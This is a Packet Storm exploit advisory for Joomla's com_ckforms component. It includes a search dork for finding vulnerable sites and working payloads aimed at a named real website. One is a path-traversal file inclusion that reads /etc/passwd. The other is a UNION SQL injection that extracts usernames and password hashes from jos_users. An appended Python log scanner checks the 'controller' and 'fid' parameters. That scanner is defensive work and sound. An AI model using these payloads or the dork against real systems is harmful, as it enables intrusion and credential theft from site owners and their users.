Joomla Ckforms Local File Inclusion / SQL Injection

2010-03-17T00:00:00
ID PACKETSTORM:87374
Type packetstorm
Reporter altbta
Modified 2010-03-17T00:00:00

Description

                                        
                                            `  
  
####################################################################  
>>>>> Author : altbta [l_9@hotmail.com]  
>>>>> Home : www.v4-team.com/cc  
>>>>> Script : Joomla Component com_ckforms  
>>>>> Bug Type : Multiple Vulnerabilities  
>>>>> Dork : inurl:"com_ckforms"  
  
####################################################################  
  
===[ Exploit ]=== [LFI]  
  
http://site/index.php?option=com_ckforms&controller=[LFI]  
http://segelbart.se/hjbk/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00  
  
===[ Exploit ]=== [sql]  
  
http://site/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=2[sql]  
http://segelbart.se/hjbk/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=  
-2 0UNION 0SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from jos_users--  
  
####################################################################  
RxH & ab0-3th4b  
  
  
  
`
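
A defensive check for the two parameters named in the advisory, added here as an example and not part of the original advisory: it flags com_ckforms requests whose `controller` value is not a plain identifier or whose `fid` value is not an unsigned integer. The allow-list patterns, the function names and the sample request lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request targets (path + query), as they would appear
# in a web server access log. None of these are real log entries.
SAMPLE_REQUESTS = [
    "/index.php?option=com_ckforms&view=ckforms&id=3",
    "/index.php?option=com_ckforms&controller=../../../../etc/passwd%00",
    "/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata"
    "&layout=detail&task=detail&fid=2",
    "/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata"
    "&layout=detail&task=detail&fid=-2%20UNION%20SELECT%201,2,3",
    "/index.php?option=com_content&view=article&id=7",
]

# Assumed allow-lists: a controller is a bare identifier, a form id is digits only.
SAFE_CONTROLLER = re.compile(r"[A-Za-z0-9_]+")
SAFE_FID = re.compile(r"[0-9]+")


def classify(request_target):
    """Return a list of findings for one request target; empty if clean."""
    # parse_qs percent-decodes values, so %00 and %20 are seen as raw bytes.
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if "com_ckforms" not in query.get("option", []):
        return []  # not addressed to this component
    findings = []
    for value in query.get("controller", []):
        if not SAFE_CONTROLLER.fullmatch(value):
            findings.append("controller: not a plain identifier (possible LFI)")
    for value in query.get("fid", []):
        if not SAFE_FID.fullmatch(value):
            findings.append("fid: not an unsigned integer (possible SQL injection)")
    return findings


def scan(request_targets):
    """Map each suspicious request target to its findings."""
    hits = {}
    for target in request_targets:
        findings = classify(target)
        if findings:
            hits[target] = findings
    return hits


if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS).items():
        print(target, "->", "; ".join(findings))
```

The same two allow-list rules can be enforced in front of the application (WAF or reverse proxy) until the component is patched or removed.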